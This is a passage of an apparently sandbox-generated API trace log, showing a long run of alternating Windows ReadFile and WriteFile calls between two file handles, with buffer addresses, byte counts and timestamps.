lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.700] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x213, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.700] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.701] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.701] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.702] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x222, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.702] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.703] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.704] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.705] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.706] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.706] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.707] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.708] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.708] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.709] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.711] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.711] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.712] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.714] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.714] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.715] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.716] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.718] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.718] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.719] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.719] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.720] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.720] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.721] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.721] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.722] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.722] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.724] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.725] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.725] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.727] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.727] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.728] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.728] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.729] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.730] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.730] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.731] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.731] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.732] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.732] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.733] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.733] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.734] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.734] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.735] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.735] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.736] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.736] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.737] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.737] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.738] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.739] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.739] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.742] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.743] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.743] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.743] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.744] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.745] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.746] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.746] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.747] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.747] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.748] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.748] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.749] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.749] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.750] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.750] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.751] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.751] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.752] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.752] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.753] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.753] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.754] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.754] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.755] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.755] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.756] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: 